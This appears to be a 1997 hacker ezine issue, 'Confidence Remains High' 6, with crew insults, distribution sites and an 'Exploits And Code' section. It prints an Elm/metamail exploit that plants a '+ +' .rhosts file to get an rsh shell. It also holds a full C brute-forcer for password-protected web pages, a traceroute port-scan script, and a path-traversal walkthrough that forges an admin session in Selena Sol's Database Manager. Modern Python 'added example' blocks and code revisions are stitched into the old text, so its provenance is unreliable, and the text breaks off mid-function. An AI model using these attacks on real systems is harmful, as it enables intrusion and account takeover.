.o. cZo .o.  Team CodeZero Presents  .o. cZo .o.

CYBERJUNKIE IS A FAT LYING GREASY CUNT - Cold-Fire

[ASCII art: block-letter "CRH" logo spelling out "Confidence Remains High"]

Issue 6                                                   12th December 1997

Editor               : so1o
Pimped falken's flea : tymat
The usual            : om3n, zer0x, xFli, electro, Spheroid and helix.
Not forgotten        : loss, organik, d-storm (aka el8), peenut, pzn, suid and manly.
Special thanks to    : Shok, dlc, efpee, chameleon, daxx, falken, figster and cain.
Windows              : The carparts crew.
Kick in the teeth to : TRON and stealth (aka. dev_null)

.-----------[ An Official ]-----------.
:     [ASCII art: small "CRH" logo]   :
:-[ Confidence Remains High ]-:
`-----------[ Production ]------------'

We wrote this in 9 days in total, which is reasonably impressive considering
the content. We hope you enjoy it, because we won't be putting out much until
1998 :)

-- so1o

In This Bumper Sized Christmas Issue :

------=> Section A : Introduction And Cover Story.

1. Confidence Remains High issue 6....................: Tetsu Khan
2. Policy.............................................: so1o

------=> Section B : Exploits And Code.

1. EXCLUSIVE CRH SENDMAIL / ELM 2.4 REMOTE EXPLOIT....: figster
2. TraceProbe.sh......................................: falken
3. BruteWeb (SSL) 2.0.................................: BeastMaster V
4. Check.sh...........................................: xFli
5. Selena Sol remote flaw (unpublished)...............: Cain

------=> Section C : Phones / Scanning / Radio.

1. ShokDial...........................................: Shok
2. More MIT dialups...................................: zer0x
3. Hiding within the system...........................: efpee
4. An introduction to LightSpan 2000's................: dlc
5. An introduction to the NEC P3......................: DaXX
6. More Russian dialups...............................: Lirik
7. UK x.25 network numbers............................: Cold-Fire

------=> Section D : Miscellaneous.

1. A short introduction to IPv6.......................: so1o
2. Newbie sk00l.......................................: so1o
3. Windows NT filesharing basics......................: chameleon
4. BitchX / crackrock bug.............................: so1o / Shok
5. Nifty Lynx trick...................................: Electric Nectar
6. No-more negative...................................: so1o

------=> Section E : World News.

1. Pentagon hacked....................................: so1o

------=> Section F : Projects.

1. TOTALCON '98.......................................: so1o

------=> Section G : FIN.

===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================

1. Confidence Remains High issue 6 : Tetsu Khan

Welcome to a vastly new and improved Confidence Remains High, now geared to
(basically) everyone we could think of. There may be some parts that some of
you dislike and think beneath you, as well as some parts you actually learn
something from. As always, we hope you enjoy this issue, and those to come in
the future..

The distro list..
=================

www.technotronic.com     /ezines/crh/
cybrids.simplenet.com    /Toast/files/CRH/
ftp.linuxwarez.com       /pub/crh/
ftp.sekurity.org         /users/so1o/

2.
Policy : so1o

In issues 1, 2 and 3, we took our readers through some simple steps of getting
some exploits, using them, and reaping the rewards. Some, if not most, of the
exploits we published were taken from recent posts to BugTraq (at
http://www.geek-girl.com/bugtraq) and from websites such as the acclaimed
www.rootshell.com. Back then CRH was aimed solely at those who had read 1980's
BBS text files until they were blue in the face and couldn't stand another
"UNIX for beginners" file, so we put out this magazine in an attempt to take
the "newbies" who wanted to learn and give them an opportunity to gain
up-to-date knowledge about the scene and the way things work now, because
those who write other magazines really don't gear their articles to those who
aren't fully confident with Unix and the ideas and methodologies that are
needed to understand exactly what's going on.

Since then our readership levels have increased, and more and more of the
people who are highly skilled (halflife for one) have made statements about
Confidence Remains High being weak and lame. That's only an opinion, but none
the less we have taken it into account, and tried our best to make this, and
issues to come, geared to both newbies and the elite few who care to
criticize us..

We don't want to be like Phrack, they get a lot of flames themselves. The
only reason we write these files is to learn, keep ourselves out of trouble,
teach others, and most importantly, to have fun (and become famous, heh
j/k).. If you want something a little more simple to understand, then read
CRH; if you want something that is only understandable by those who wrote the
articles and the few who actually know about the subjects covered, then read
Phrack. If you don't understand either Phrack or CRH, then read THTJ, which
is a weak version of CRH, with VB programs, articles that were previously in
CRH, and, not forgetting, members of sIn as writers, hahahahoeowehahahahaha!
Thank you for listening,

so1o

===============================================================================
==[ EXPLOITS / CODE ]==========[ .SECTION B. ]============[ EXPLOITS / CODE ]==
===============================================================================

1. EXCLUSIVE CRH SENDMAIL / ELM 2.4 REMOTE EXPLOIT : figster

On a variety of machines running Sendmail, Elm 2.4 will also be in use. The
hole concerns the metamail helper sun-message.csh, which Elm calls to handle
a MIME attachment. It in turn calls uudecode, which creates the file named in
the uuencoded "begin" line wherever on the filesystem that name points, with
whatever permissions you set in that line, and then fails gracefully without
telling the recipient that a file has been written, h0h0h0. If you use base64
MIME encoding on top, the recipient can even save the attachment, look at it,
and not see the evil hax0r file that was specified. So far Linux, and anything
else running the metamail decoder sun-message.csh, is vulnerable..

This is basically what you do... It may not work, don't blame us :

------------------------------------------------------------------

1) create your evil file (a .rhosts in this case)...

   % echo "+ +" > /tmp/eatm3

2) next uuencode your "logic bomb", giving it the name you want uudecode on
   the target to write it out as (here /bin/.rhosts)...

   % uuencode /tmp/eatm3 /bin/.rhosts > /tmp/eatme.uue

3) attach /tmp/eatme.uue to the e-mail to the target so that the Content-Type
   is set to "default/text"

4) send your e-mail to the target, eg. bin@target.here.com

5) then attempt to use rsh..

   % rsh -l bin target.here.com csh -i

If you don't get a shell from using rsh, then in.rshd may not be running, or
the exploit may have failed (the most probable cause). Remember that uudecode
runs as the user who reads the mail, so the target path has to be writable by
that account; that is one reason it so often fails.

This original technique was given to figster, then he wrote up a file, then I
made the file easier to understand. It's quite rare for this to actually work,
so don't think it will first time :-)

2. TraceProbe.sh : falken

#!/bin/sh
#
# falken@rune.org presents Traceprobe version 1.4
#
# basically uses strobe to portscan all the hosts from
# a traceroute query, saves me alot of time, thats what it's for..
#
# requires strobe in the same directory as well as
# access to awk and most importantly traceroute.
#
# usage: traceprobe.sh host startport endport

if [ $# -ne 3 ]; then
  echo "usage: $0 host startport endport" >&2
  exit 1
fi

/usr/sbin/traceroute "$1" > "$1.traceroute"

# hop lines start with the hop number and carry the host (or address) in
# field 2; the "traceroute to ..." header line and timed out hops ("*")
# are dropped so they don't end up being handed to strobe
awk '$1 ~ /^[0-9]+$/ && $2 != "*" {print $2}' "$1.traceroute" > "$1.traceroute.host"

strobe -i "$1.traceroute.host" -b "$2" -e "$3"

# cleanup here..
/bin/rm -f "$1.traceroute" "$1.traceroute.host"

3. BruteWeb (SSL) 2.0 : BeastMaster V

/*
 *
 * Brute Web (SSL) 2.0, BeastMaster V.
 * September 1997, for Confidence Remains High magazine.
 *
 * You will probably need to download the SSL libraries from
 * ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/
 *
 * To compile (one line) :
 *
 *   cc -o brute_ssl -I/usr/local/ssl/include brute_ssl.c \
 *      -L/usr/local/ssl/lib -lssl -lcrypto
 *
 * brute_ssl to run, gives usage..
 *
 * Disclaimer : I am not responsible for anything you do with this
 * tool, so please use it in a responsible manner.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

#define HTTPD_UNAUTHORIZED 401
#define FL __FILE__,__LINE__

#define MAXDICTWORD      64
#define MAXNAMEPASSLEN   128
#define MAXENCODEDSTRING 256   /* base64 of MAXNAMEPASSLEN bytes is 172 chars */
#define MAXSENDSTRING    1024  /* was 300, too small for realm + host + credentials */

#define HAS_DICTIONARY 0x0001
#define HAS_USERNAME   0x0002
#define HAS_PORTNUMBER 0x0004
#define HAS_HOSTNAME   0x0008
#define HAS_VERBOSE    0x0010
#define HAS_SSL_OPT    0x0020
#define HAS_REALM      0x0040
#define HAS_DONE_IT    0x0080

/* everything except -v and -z has to be given */
#define HAS_REQUIRED (HAS_DICTIONARY|HAS_USERNAME|HAS_PORTNUMBER|HAS_HOSTNAME|HAS_REALM)

static const char alphabet[] =
  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

char *prg_nme;
int mask;

/* BeastMaster V's error logging function */
void proc_err(const char *func, const char *file, int line, const char *fmt, ...)
{
  va_list args;

  if (prg_nme != NULL)
    fprintf(stderr, "[%s]", prg_nme);
  fprintf(stderr, " %s() <%s:%d> : ", func, file, line);
  va_start(args, fmt);
  vfprintf(stderr, fmt, args);
  va_end(args);
  fputc('\n', stderr);
  fflush(stderr);
}

/* an implementation of signal() based on sigaction() */
void (*r_signal(int sig, void (*func)(int)))(int)
{
  struct sigaction act, oact;

  act.sa_handler = func;
  sigemptyset(&act.sa_mask);
  act.sa_flags = 0;
#ifdef SA_RESTART
  act.sa_flags |= SA_RESTART;
#endif
  if (sigaction(sig, &act, &oact) < 0)
    return SIG_ERR;
  return oact.sa_handler;
}

/* read one line (at most buf_size-1 bytes) over an SSL connection;
 * returns the number of bytes stored, 0 on EOF/error with nothing read */
int SSL_readln(SSL *ssl_con, char *buf, int buf_size)
{
  int i = 0, w;
  char tmp[1];

  while (i < buf_size - 1) {
    w = SSL_read(ssl_con, tmp, 1);
    if (w <= 0) break;
    if (tmp[0] == 0) continue;          /* drop embedded NULs */
    buf[i++] = tmp[0];
    if (tmp[0] == '\n') break;
  }
  buf[i] = '\0';
  return i;
}

/* read from a plain socket into a buffer until len-1 bytes or newline */
int socket_readln(int s, char *buf, int len)
{
  int i = 0, w;
  char tmp[1];

  while (i < len - 1) {
    w = read(s, tmp, 1);
    if (w <= 0) break;
    if (tmp[0] == 0) continue;
    buf[i++] = tmp[0];
    if (tmp[0] == '\n') break;
  }
  buf[i] = '\0';
  return i;
}

/* base64 encode len bytes of src into dst, which must hold at least
 * 4*((len+2)/3)+1 bytes. Standard alphabet, '=' padding, no line wrapping:
 * an Authorization header is one line. (The original's hand rolled streaming
 * encoder restarted its output at column 60, which corrupted anything longer
 * than a 45 byte user:password; it has been replaced.) */
void base64_encode(const unsigned char *src, size_t len, char *dst)
{
  size_t i = 0, j = 0;

  while (i + 3 <= len) {
    unsigned long v = ((unsigned long)src[i] << 16) |
                      ((unsigned long)src[i + 1] << 8) | src[i + 2];
    dst[j++] = alphabet[(v >> 18) & 0x3F];
    dst[j++] = alphabet[(v >> 12) & 0x3F];
    dst[j++] = alphabet[(v >> 6) & 0x3F];
    dst[j++] = alphabet[v & 0x3F];
    i += 3;
  }
  if (i < len) {                         /* one or two trailing bytes */
    unsigned long v = (unsigned long)src[i] << 16;
    if (i + 1 < len) v |= (unsigned long)src[i + 1] << 8;
    dst[j++] = alphabet[(v >> 18) & 0x3F];
    dst[j++] = alphabet[(v >> 12) & 0x3F];
    dst[j++] = (i + 1 < len) ? alphabet[(v >> 6) & 0x3F] : '=';
    dst[j++] = '=';
  }
  dst[j] = '\0';
}

/* takes the "user:password" string and a caller supplied buffer */
void encode_string(char *name_pass, char *buf_64)
{
  base64_encode((const unsigned char *)name_pass, strlen(name_pass), buf_64);
}

/* check the web server's HTTP status line. 401 means the credentials were
 * rejected. Anything outside 2xx/3xx (a 404 for a mistyped realm path, a
 * 500) is not a hit either, so it is not reported as one. */
short check_response(char *response)
{
  int version, httpd_code;

  if (sscanf(response, "HTTP/1.%d %d", &version, &httpd_code) != 2)
    return 0;
  if (httpd_code == HTTPD_UNAUTHORIZED)
    return 0;
  return (httpd_code >= 200 && httpd_code < 400) ? 1 : 0;
}

/* reads a line of at most max-1 chars from a file into buf and returns its
 * length; 0 at EOF. Blank lines and CRs are skipped, long words truncated. */
short read_line(FILE *fp, char *buf, int max)
{
  int c, i = 0;

  while ((c = fgetc(fp)) != EOF) {
    if (c == '\n') {
      if (i == 0) continue;
      break;
    }
    if (c == '\r' || c == 0) continue;
    if (i < max - 1) buf[i++] = (char)c;
  }
  buf[i] = '\0';
  return (short)i;
}

void terminate(int sig)
{
  proc_err("terminate", FL, "[%s] has caught %d (%s)", prg_nme, sig,
           (sig == SIGINT) ? "SIGINT" : "SIGSEGV");
  exit(EXIT_FAILURE);
}

/* creates a TCP socket and connects it to a peer */
int make_socket(char *in_host, unsigned short port_num)
{
  int sd;
  struct hostent *hp;
  struct sockaddr_in sa;

  sd = socket(AF_INET, SOCK_STREAM, 0);
  if (sd == -1) {
    proc_err("make_socket", FL, "Could not create socket->%s", strerror(errno));
    exit(EXIT_FAILURE);
  }
  hp = gethostbyname(in_host);
  if (!hp) {
    if (h_errno == HOST_NOT_FOUND)
      proc_err("make_socket", FL, "Could not resolve [%s]->Host not found", in_host);
    else
      proc_err("make_socket", FL, "Could not resolve [%s]->DNS error", in_host);
    exit(EXIT_FAILURE);
  }
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = hp->h_addrtype;
  memcpy(&sa.sin_addr, hp->h_addr, hp->h_length);
  sa.sin_port = htons(port_num);
  if (connect(sd, (struct sockaddr *)&sa, sizeof(sa)) == -1) {
    proc_err("make_socket", FL, "connect() call failed->%s", strerror(errno));
    exit(EXIT_FAILURE);
  }
  return sd;
}

/* prints the program usage */
void print_usage(void)
{
  int x;
  const char *messages[] = {
    "\n\t'%s [options]'\n\n",
    "Options:\n",
    "\t-v verbose mode (print responses to stdout)\n",
    "\t-z SSL flag (use this for secure servers)\n",
    "\t-d dictionary file (full path to dictionary file)\n",
    "\t-u username (a user on the target webserver)\n",
    "\t-h hostname (host running the webserver)\n",
    "\t-p portnumber (port that the webserver runs on)\n",
    "\t-r realm (the full path to the protected realm)\n\n",
    "Example:\n",
    "\tSay everytime I type https://www.somewhere.com/protected\n",
    "\tinto netscape, a box pops up and asks me to enter in a\n",
    "\tUser ID and password. Well, I have no idea what User ID\n",
    "\tor password to enter in, so I'll try to 'guess' my way in.\n",
    "\tI have a dictionary file in /tmp/dict.txt. Next I'll guess\n",
    "\ta username of \"foo\". Now I can type a command like:\n",
    "\n",
    "  %s -z -d /tmp/dict.txt -u foo -h www.somewhere.com -p 443 -r /protected\n",
    "\n",
    "\tNow with any luck I'll eventually see a username and password.\n",
    "\ti.e: ----USERNAME=foo PASSWORD=foopass----\n\n",
    NULL
  };

  fprintf(stderr, "\n-- Brute Web (SSL) v2.0 --\n");
  for (x = 0; messages[x] != NULL; x++)
    fprintf(stderr, messages[x], prg_nme);
}

/* brute_ssl */
int main(int argc, char **argv)
{
  int c, err = 0, sd, in_port = 0, try = 0, n;
  char *export_buf = NULL;
  SSL *ssl_con = NULL;
  SSL_CTX *ssl_ctx = NULL;
  unsigned long ssl_err;
  FILE *dict_fd = NULL;
  char *dict_name = NULL, *in_host = NULL;
  char *user = NULL, *realm = NULL, *dict_word = NULL;
  char *name_pass_buf = NULL, *encoded_buf = NULL;

  if ((prg_nme = strrchr(argv[0], '/')))
    ++prg_nme;
  else
    prg_nme = argv[0];

  mask = 0;
  while ((c = getopt(argc, argv, "vzd:u:h:p:r:")) != -1) {
    switch (c) {
    case 'v': mask |= HAS_VERBOSE; break;
    case 'z': mask |= HAS_SSL_OPT; break;
    case 'd': dict_name = optarg; mask |= HAS_DICTIONARY; break;
    case 'u': user = optarg; mask |= HAS_USERNAME; break;
    case 'h': in_host = optarg; mask |= HAS_HOSTNAME; break;
    case 'p':
      in_port = atoi(optarg);
      if (in_port <= 0 || in_port > 65535) err++;
      mask |= HAS_PORTNUMBER;
      break;
    case 'r': realm = optarg; mask |= HAS_REALM; break;
    case '?': err++;
    }
  }

  /* reconstructed: the option check, signal setup and the first malloc()
   * were lost from the published copy of this file (only the trailing
   * "failed->%s" of the malloc error string survived) */
  if (optind < argc || err || (mask & HAS_REQUIRED) != HAS_REQUIRED) {
    print_usage();
    exit(EXIT_FAILURE);
  }
  r_signal(SIGINT, terminate);
  r_signal(SIGSEGV, terminate);

  dict_word = (char *)malloc(MAXDICTWORD);
  if (!dict_word) {
    proc_err("main", FL, "Call to malloc() failed->%s", strerror(errno));
    exit(EXIT_FAILURE);
  }
  name_pass_buf = (char *)malloc(MAXNAMEPASSLEN);
  if (!name_pass_buf) {
    proc_err("main", FL, "Call to malloc() failed->%s", strerror(errno));
    exit(EXIT_FAILURE);
  }
  encoded_buf = (char *)malloc(MAXENCODEDSTRING);
  if (!encoded_buf) {
    proc_err("main", FL, "Call to malloc() failed->%s", strerror(errno));
    exit(EXIT_FAILURE);
  }
  export_buf = (char *)malloc(MAXSENDSTRING);
  if (!export_buf) {
    proc_err("main", FL, "Call to malloc() failed->%s", strerror(errno));
    exit(EXIT_FAILURE);
  }
  dict_fd = fopen(dict_name, "r");
  if (dict_fd == NULL) {
    proc_err("main", FL, "Could not open dictionary file->%s", strerror(errno));
    exit(EXIT_FAILURE);
  }

  if (mask & HAS_SSL_OPT) {
#if OPENSSL_VERSION_NUMBER < 0x10100000L
    SSLeay_add_ssl_algorithms();
    SSL_load_error_strings();
    /* the original asked for SSLv2_client_method(); SSLv2 is gone from
     * every current library, so negotiate whatever the server offers */
    ssl_ctx = SSL_CTX_new(SSLv23_client_method());
#else
    ssl_ctx = SSL_CTX_new(TLS_client_method());
#endif
    if (!ssl_ctx) {
      proc_err("main", FL, "Call to SSL_CTX_new() returned a NULL");
      exit(EXIT_FAILURE);
    }
  }

  while (read_line(dict_fd, dict_word, MAXDICTWORD)) {
    sd = make_socket(in_host, (unsigned short)in_port);
    if (mask & HAS_SSL_OPT) {
      ssl_con = SSL_new(ssl_ctx);
      if (!ssl_con) {
        proc_err("main", FL, "SSL_new() returned NULL.");
        exit(EXIT_FAILURE);
      }
      SSL_set_fd(ssl_con, sd);
      if (SSL_connect(ssl_con) <= 0) {
        ssl_err = ERR_get_error();
        proc_err("main", FL, "SSL_connect() failed->%s",
                 ERR_error_string(ssl_err, export_buf));
        exit(EXIT_FAILURE);
      }
    }

    snprintf(name_pass_buf, MAXNAMEPASSLEN, "%s:%s", user, dict_word);
    encode_string(name_pass_buf, encoded_buf);
    /* header lines end in CRLF and an empty line ends the request; the Host
     * header lets this work against name based virtual hosts too */
    n = snprintf(export_buf, MAXSENDSTRING,
                 "GET %s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\n\r\n",
                 realm, in_host, encoded_buf);
    if (n < 0 || n >= MAXSENDSTRING) {
      proc_err("main", FL, "Request too long for buffer (realm/host)");
      exit(EXIT_FAILURE);
    }
    try++;

    if (mask & HAS_SSL_OPT) {
      SSL_write(ssl_con, export_buf, strlen(export_buf));
      SSL_readln(ssl_con, export_buf, MAXSENDSTRING);
    } else {
      write(sd, export_buf, strlen(export_buf));
      socket_readln(sd, export_buf, MAXSENDSTRING);
    }
    if (mask & HAS_VERBOSE)
      fprintf(stdout, "\n==[Pass # %d]============\n%s", try, export_buf);

    if (check_response(export_buf)) {
      mask |= HAS_DONE_IT;
      break;
    }

    if (mask & HAS_VERBOSE) {           /* dump the rest of the response */
      if (mask & HAS_SSL_OPT) {
        while (SSL_readln(ssl_con, export_buf, MAXSENDSTRING) > 0)
          fprintf(stdout, "%s", export_buf);
      } else {
        while (socket_readln(sd, export_buf, MAXSENDSTRING) > 0)
          fprintf(stdout, "%s", export_buf);
      }
    }
    if (mask & HAS_SSL_OPT) {
      SSL_shutdown(ssl_con);
      SSL_free(ssl_con);
    }
    close(sd);
  }

  if (mask & HAS_DONE_IT)
    fprintf(stdout, "\n\n\t----USERNAME=%s PASSWORD=%s----\n\n", user, dict_word);
  else
    fprintf(stdout, "\n\n\t----Sorry, but I could not get in.----\n");

  fclose(dict_fd);
  free(dict_word);
  free(name_pass_buf);
  free(encoded_buf);
  free(export_buf);
  if (mask & HAS_SSL_OPT)
    SSL_CTX_free(ssl_ctx);
  return (mask & HAS_DONE_IT) ? 0 : 1;
}

4. Check.sh : xFli

#!/bin/bash
#
#
# - Simple Crontab monitor for keeping tabs on index.html
#
# - At the moment, if the script finds a change in the filesize of the file
#   it will copy the bad file to /var/log/.evil and replace it with the
#   backup, log its actions to /var/log/check.log and inform [mail] of the error.
#   If the backup itself has the wrong filesize, it will shutdown the
#   inetd superserver and notify [mail] of the mismatch. You should edit
#   this to run commands more suitable to your situation (the killall line).
#
# - Note that a size check alone will not catch a defacement padded out to
#   the same size as the original; if you can, compare a checksum (md5sum)
#   of the file instead of, or as well as, its size.
#
# - Usage check.sh [original] [backup] [filesize] [mail]
#
#
# - [original] is the FULL PATH to the file you want to guard e.g. /home/http/index.html
# - [backup] is the FULL PATH to the backup of the original e.g. /root/backup.html
# - [filesize] is the size in bytes of the original, e.g. 39790
# - [mail] is a mail address that the script should send notifications to, e.g. root@localhost
#
# - If you want to run the check every 5 minutes, add the following line
# - to root's crontab:
#
# 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /root/check.sh /home/http/index.html /root/backup.html 39790 root@localhost
#
# (remembering to change the paths and the filesize)
#
#
# --=[ Cheap and nasty code from xFli, your number 1 discount store ]=--
#
# ONCE AGAIN: TAKE THE TIME TO EDIT THIS TO SUIT YOUR NEEDS BETTER
# You might want to take out the line that returns the
# status of the file even if it is 'OK' , especially
# if you are going to run the script a lot like every
# 30 seconds... :]
#
TIME=`/bin/date`   # timestamp for the log (the original used uname -v, which
                   # prints the kernel build string, not the time)

if [ -z "$1" ]; then
  echo "Please read the usage instructions for this script"
  exit 1
fi

# size of a file in bytes. The original grepped the 'ls -la' output for the
# number, which also matches it inside the permissions, link count or date.
size_of() { ls -l "$1" | awk '{print $5}'; }

if [ "$(size_of "$1")" = "$3" ]; then
  echo "$1 OK $TIME" >> /var/log/check.log
  echo "" >> /var/log/check.log
else
  echo "" >> /var/log/check.log
  echo " - WARNING - file size mismatch on $1 at $TIME" >> /var/log/check.log
  echo "WARNING : FILESIZE MISMATCH on $1 $TIME" | mail "$4"
  mv "$1" /var/log/.evil
  if [ "$(size_of "$2")" = "$3" ]; then
    cp "$2" "$1"
  else
    echo "" >> /var/log/check.log
    echo " - WARNING - Filesize mismatch on BACKUP FILE $2 at $TIME" >> /var/log/check.log
    echo " - WARNING - Filesize mismatch on $2 at $TIME" | mail "$4"
    echo "Shutting down inetd superserver $TIME" >> /var/log/check.log
    killall -9 inetd
    echo "" >> /var/log/check.log
  fi
fi

5. Selena Sol remote flaw : Cain

After many hours of sifting through the source code as part of my job at an
ISP, I stumbled onto something. A problem in the midst of the authentication
libraries of Selena Sol's Database Manager. In auth-lib.pl at line 192 it
reads

    open (SESSIONFILE, "$auth_session_dir/$session_file")

Now this is interesting. Nowhere does it check to make sure you don't have any
'/' chars in $session_file. So we can specify our own session file outside the
intended path :)

The session file format is:

    id|group|fname|lname|email

Always have the group be "admin". This way you get access to the entire
database. Let's say this remote system is some weird warez archive. They want
us to upload files. So we make a file called werd.dat:

    cain|admin|Cain|Bomb|cain@tasam.com

Then we FTP this file up to the remote system. Depending on what OS they have,
it will either be in /var/ftp/incoming or /home/ftp/incoming or whatever, you
figure it out. Now we make our HTML exploit!!! Just create this file and view
it using lynx, netscape, or whatever.
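The open() described above, modelled in Python as an added example (this is not Cain's HTML form, which is not printed in this copy, nor Selena Sol's Perl). vulnerable_session_path() reproduces the string concatenation of auth-lib.pl line 192, with the ".dat" suffix appended as Cain describes (an assumption about where the suffix is added); safe_session_path() is the check the library lacked. All files and the directory layout are constructed in a temporary directory so the demo runs offline.

```python
"""Session-file path traversal: the vulnerable join beside a hardened one."""
import os
import re
import tempfile

SESSION_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def vulnerable_session_path(auth_session_dir, session_id):
    # Perl: open (SESSIONFILE, "$auth_session_dir/$session_file")
    # with $session_file = "$session_id.dat"; nothing rejects '/' or '..'
    return f"{auth_session_dir}/{session_id}.dat"


def safe_session_path(auth_session_dir, session_id):
    """Whitelist the id, then confirm the resolved file stays inside the dir."""
    if not SESSION_ID_RE.fullmatch(session_id):
        raise ValueError("session id contains characters outside [A-Za-z0-9_-]")
    base = os.path.realpath(auth_session_dir)
    path = os.path.realpath(os.path.join(base, session_id + ".dat"))
    if os.path.dirname(path) != base:      # catches symlinks the regex cannot
        raise ValueError("session file resolves outside the session directory")
    return path


def load_session(path):
    """Parse the id|group|fname|lname|email record."""
    with open(path, encoding="ascii") as f:
        fields = f.readline().rstrip("\r\n").split("|")
    if len(fields) != 5:
        raise ValueError("malformed session record")
    return dict(zip(("id", "group", "fname", "lname", "email"), fields))


def is_admin(session):
    return session["group"] == "admin"


def demo():
    """Attacker's FTP-uploaded record vs. a legitimate session, both constructed."""
    with tempfile.TemporaryDirectory() as root:
        session_dir = os.path.join(root, "Session_files")
        incoming = os.path.join(root, "var", "ftp", "incoming")
        os.makedirs(session_dir)
        os.makedirs(incoming)
        # constructed: the record Cain FTPs into the anonymous incoming directory
        with open(os.path.join(incoming, "werd.dat"), "w") as f:
            f.write("cain|admin|Cain|Bomb|cain@tasam.com\n")
        # constructed: a session the application wrote itself
        with open(os.path.join(session_dir, "a1b2c3.dat"), "w") as f:
            f.write("a1b2c3|user|Joe|Bloggs|joe@example.org\n")

        # the session_file value from the attacker's form: relative, no ".dat"
        evil_id = "../var/ftp/incoming/werd"
        results = {}
        results["vulnerable_grants_admin"] = is_admin(
            load_session(vulnerable_session_path(session_dir, evil_id)))
        try:
            safe_session_path(session_dir, evil_id)
            results["hardened_blocks_it"] = False
        except ValueError:
            results["hardened_blocks_it"] = True
        legit = load_session(safe_session_path(session_dir, "a1b2c3"))
        results["legit_session_still_works"] = legit["group"] == "user"
        return results


if __name__ == "__main__":
    print(demo())
```

The regex alone would be enough against this particular input; the realpath() comparison is kept because a session directory that contains a symlink, or an id that is valid but maps to a file an attacker can overwrite, is the next thing to go wrong.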
All the paths you'll have to figure out on your own. Notice there's no ".dat"
after "../../var/ftp/incoming/werd"; the script appends that automatically.
You may need to change the number of ../'s, but don't worry about going
overboard: once you have climbed to / the extra ones do nothing, and it will
still work.

What exactly happens? Well, db_manager.cgi runs with whatever setup_file you
specified. It sees that the session_file variable is declared, so instead of
going to the login screen it reads the info from the session file
"Session_files/../../var/ftp/incoming/werd.dat", which contains administrator
status because the group is "admin". Boom. You're in the database, free to
modify or delete anything.

The reason I found this out was because I found one interesting database I
couldn't search through without a valid username and password. So I did this.
I wouldn't modify anything because who cares.

Cain

===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================

1. ShokDial : Shok

Originally written based on an idea by zer0x, and written for public release.
This article is NOT property of THTJ, because they are fucking sIn groupies;
this was written by Shok, and is therefore the intellectual property of that
author, so don't even think about it you fucking THTJ fools.

--so1o

Serial programming for unix..... boy this stuff is fun. Well, unix is famous
for its special files. The modem is just a file you can open(), read(), and
write() to... for that reason this program can be used on all unixes. The only
thing that needs to be changed is the #define MODEMPORT "/dev/cua1", because
most unix/unix clones have their own modem port names. For example /dev/ttyS?,
which is COM1 (to the DOS users), would be /dev/ttym? in IRIX.
Now once this program opens the modem (via the device/special file) for
reading/writing, it will write() to it, sending standard modem instructions
like +++ATH, ATZ etc.... this comes before any dialing, to get the modem
ready.... we also use a function to check for "OK" so we know that all is
well. On receiving this, we put the number we want to dial into a character
buffer, append a "\r" to it (so it actually sends the command), and then
write(fd (the file desc. for /dev/cua1), thebufwiththenum,
strlen(thebufwiththenum));

Now once you do this, you can't write "+++ATH" to it, because it will be sent
as the login name (assuming you've connected to a host), so what I did was
open the other modem port (there are two: /dev/cua0 and /dev/ttyS0 are
essentially the same thing (both COM1, to explain it easier), one is used for
dialing out (cua?) and one is used for dialing in and out (ttyS?)). So I
opened up the other port and used that to send the command to hang up. All the
other stuff isn't complex, they are all C primitive instructions like
ScanMin++; which would increase ScanMin by 1, repeat a while loop, and then
the next strcat(phonenum, ScanMin); ... would dial the next number...... you
get the idea. That's about all there really is to say about the technical
stuff about it.

Oh yeah, one thing..... when it connects, it looks for the string "CONNECT"
returned from the modem serial file. You won't get this message from faxes,
as you only get it when the connection is complete, so this will only return
*** CONNECT *** if it was a modem. It will output both to the screen and to
the logfile *** CONNECT *** to 1-xxx-xxx-xxxx.
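The dialing loop Shok describes, as an added example; this is not Shok's code (ShokDial itself is not printed in this issue). FakeModem stands in for the /dev/cua? device and answers AT commands the way a Hayes-compatible modem does, from a constructed table of which numbers in the made-up 555-012 exchange carry a modem. Everything else (ATZ and wait for OK, ATDT<number> followed by "\r", match the result code, log *** CONNECT ***, then escape with +++ and ATH before the next number) is the procedure from the text. To dial for real you would replace FakeModem with a handle on the serial device; scan() and read_result() do not change.

```python
"""Sequential/random wardialer loop driven against a simulated Hayes modem."""
import random

RESULT_CODES = ("OK", "CONNECT", "NO CARRIER", "BUSY", "NO DIALTONE", "ERROR")


class FakeModem:
    """Constructed stand-in for the modem device: deterministic answers, no line."""

    def __init__(self, carriers, busy=()):
        self.carriers = set(carriers)   # numbers that answer with a data carrier
        self.busy = set(busy)
        self.online = False             # carrier up?
        self.command_mode = True        # False while our bytes go to the far end
        self.inbuf = b""

    def _reply(self, text):
        self.inbuf += b"\r\n" + text.encode("ascii") + b"\r\n"

    def write(self, data):
        cmd = data.decode("ascii").strip().upper()
        if self.online and not self.command_mode:
            if cmd == "+++":            # escape sequence: back to command mode
                self.command_mode = True
                self._reply("O K".replace(" ", ""))
            return                      # anything else went to the remote host
        if cmd in ("ATZ", "ATE0", "ATH"):
            if cmd == "ATH":
                self.online = False
            self._reply("OK")
        elif cmd.startswith("ATDT"):
            number = cmd[4:]
            if number in self.carriers:
                self.online, self.command_mode = True, False
                self._reply("CONNECT 9600")
            elif number in self.busy:
                self._reply("BUSY")
            else:                       # fax, voice or no answer: never CONNECT
                self._reply("NO CARRIER")
        else:
            self._reply("ERROR")

    def read_line(self):
        if b"\n" not in self.inbuf:
            return None
        line, _, self.inbuf = self.inbuf.partition(b"\n")
        return line.decode("ascii").strip()


def read_result(modem):
    """Skip blank/echo lines until a result code arrives; return its keyword."""
    while True:
        line = modem.read_line()
        if line is None:
            raise TimeoutError("modem sent no result code")
        for code in RESULT_CODES:
            if line.startswith(code):
                return code


def at(modem, command):
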